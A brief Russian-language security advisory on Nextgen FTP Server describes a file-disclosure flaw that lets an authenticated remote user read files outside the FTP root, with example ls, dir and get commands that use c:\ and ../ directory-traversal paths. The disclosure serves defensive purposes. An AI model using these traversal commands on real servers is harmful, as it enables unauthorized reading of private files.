Программа: Nextgen FTP Server
Уязвимость раскрытия файлов обнаружена в Nextgen FTP Server. Удаленный авторизованный пользователь может просматривать произвольные файлы на целевой системе, расположенные вне FTP root каталога.
Пример:
ls c:\*.*
ls ..
ls \..\
ls /../
dir c:\
dir \..\*.*
get c:\"Exist File"
get \..\"Exist File"
